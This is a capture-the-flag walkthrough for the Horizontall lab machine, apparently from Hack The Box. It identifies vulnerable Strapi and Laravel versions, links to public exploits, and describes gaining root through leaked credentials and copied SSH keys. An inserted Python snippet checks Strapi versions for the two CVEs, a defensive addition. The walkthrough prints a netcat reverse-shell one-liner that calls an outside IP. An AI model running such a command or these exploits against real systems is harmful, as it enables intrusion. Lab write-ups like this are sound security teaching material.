Horizontall
Enumeration
Ports and Services
Software Installed:
- Strapi CMS 3.0.0-beta.17.4
- Laravel v8 (PHP v7.4.18)
Nmap Scan Results:
Gobuster:
VHosts:
Gobuster - api-prod.horizontall.htb:
Nikto:
From /admin/init I can get the version:
Initial Foothold
Strapi CMS 3.0.0-beta.17.4 is vulnerable to both a password reset vulnerability and a remote code execution vulnerability:
- CVE-2019-18818
- CVE-2019-19609
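A defender-side check for the two CVEs above, as an added example that is not part of the original write-up: it reads the version string from an /admin/init response body and lists which of the two CVEs that version is still exposed to. The JSON layout (`data.strapiVersion`) and the sample body are assumptions; the fixed-in versions are the ones given in the public CVE descriptions.

```python
import json
import re

# Fixed-in versions as stated in the public CVE descriptions.
FIXED_IN = {
    "CVE-2019-18818": "3.0.0-beta.17.5",  # password reset mishandling
    "CVE-2019-19609": "3.0.0-beta.17.8",  # RCE via plugin install/uninstall
}

def version_key(version):
    """Sortable key for a semver string, following semver precedence rules."""
    m = re.fullmatch(r"v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+.*)?", version.strip())
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    core = tuple(int(x) for x in m.group(1, 2, 3))
    if m.group(4) is None:
        # A release outranks every pre-release of the same core version.
        return core + (1, ())
    # Numeric identifiers sort numerically and below alphanumeric ones.
    pre = tuple((0, int(p), "") if p.isdigit() else (1, 0, p) for p in m.group(4).split("."))
    return core + (0, pre)

def triage_init_response(body):
    """Return (version, sorted CVE ids still unpatched) for an /admin/init JSON body."""
    version = json.loads(body)["data"]["strapiVersion"]  # assumed field name
    key = version_key(version)
    open_cves = sorted(c for c, fixed in FIXED_IN.items() if key < version_key(fixed))
    return version, open_cves

# Constructed sample response; only the version string comes from the write-up.
SAMPLE = '{"data": {"currentEnvironment": "development", "strapiVersion": "3.0.0-beta.17.4"}}'

if __name__ == "__main__":
    for body in (SAMPLE, SAMPLE.replace("17.4", "17.6"), SAMPLE.replace("-beta.17.4", "")):
        print(triage_init_response(body))
```

The pre-release comparison matters here: a plain string or `major.minor.patch` comparison cannot tell beta.17.4 from beta.17.8, since both share the 3.0.0 core.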
Exploit-DB has a Python script that resets the admin password and also allows remote code execution:
https://www.exploit-db.com/exploits/50239
Rev Shell:
Executed nc
CMD: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.53 8888 >/tmp/f
Found password in
/opt/strapi/myapi/config/environments/development/database.json
Created and uploaded an SSH key for the strapi user
User.txt Proof Screenshot
Privilege Escalation
Port 8000 is hosting Laravel Framework:
This version of Laravel is vulnerable to RCE (CVE-2021-3129):
https://github.com/nth347/CVE-2021-3129_exploit
Copied SSH key from strapi to root:
SSH as root:
Root Screenshot Here: